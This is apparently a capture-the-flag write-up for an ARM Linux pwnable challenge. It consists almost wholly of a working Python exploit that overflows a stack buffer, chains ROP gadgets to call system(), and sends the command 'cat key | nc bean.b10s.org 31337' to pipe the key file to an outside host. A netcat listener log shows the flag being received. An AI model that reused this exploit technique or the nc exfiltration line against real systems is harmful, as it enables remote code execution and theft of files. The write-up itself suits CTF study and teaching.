Category : Pwnables (0x41414141)
Summary : uninitialized variable, stack-based buffer overflow, ROP on ARM Linux
Exploit
#!/usr/bin/python # recv(4, buf, len(cmd)) -> system(buf) from socket import * from struct import pack import time, sys p = lambda x: pack("<L", x) HOST = "bitterswallow.shallweplayaga.me" PORT = 6492 send_data = 0x0001D9FC freespace = 0x00027628 system = 0xb6e5cbd8 command = "cat key | nc bean.b10s.org 31337" recvdata = 0x0001DC04 """ .text:0001E3C8 MOV R0, R6 .text:0001E3CC MOV R1, R7 .text:0001E3D0 MOV R2, R8 .text:0001E3D4 ADD R4, R4, #1 .text:0001E3D8 BLX R3 .text:0001E3DC CMP R4, R10 .text:0001E3E0 BNE loc_1E3C4 .text:0001E3E4 LDMFD SP!, {R3-R8,R10,PC} """ payload = "" payload += "a"*0x444 payload += p(0x0001E3E4) # .text:0001E3E4 F8 85 BD E8 / LDMFD SP!,{R3-R8,R10,PC} ########################### payload += p(0x0001E3F0) # .text:0001E3F0 1E FF 2F E1 / BX LR payload += p(0x00000000) * 2 payload += p(0x00000004) # r0 payload += p(freespace) # r1 payload += p(len(command)) # r2 payload += p(0x00000001) ########################### payload += p(0x0001E3C8) ########################### payload += p(0x11111111)*7 ########################### payload += p(recvdata) ########################### #payload += p(0x0001E3E4) # .text:0001E3E4 F8 85 BD E8 LDMFD SP!,{R3-R8,R10,PC} ########################### payload += p(0x0001E3F0) # .text:0001E3F0 1E FF 2F E1 BX LR payload += p(0x00000000)*2 payload += p(freespace) # r0 payload += p(0x00000001)*3 ########################### payload += p(0x0001E3C8) ########################## payload += p(0x11111111)*7 ########################## payload += p(system) ########################## s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) time.sleep(0.5) s.recv(1024) s.send("y") s.send("\x32") s.send("\x01\x00") s.send("b") time.sleep(0.5) s.recv(1024) s.send("y") time.sleep(0.5) s.send("\x3f") s.send(p(len(payload))[0:2]) s.send(payload) time.sleep(0.5) s.send("y") time.sleep(0.5) s.recv(1024) s.send(command) time.sleep(0.5) s.close() |
root@ubuntu:~/pwn100# ./exploit.py
-----------------------------------------------------------
root@ubuntu:~# nc -lv 31337
Connection from 131.247.27.199 port 31337 [tcp/*] accepted
The key is: sometimes you just have to suck it up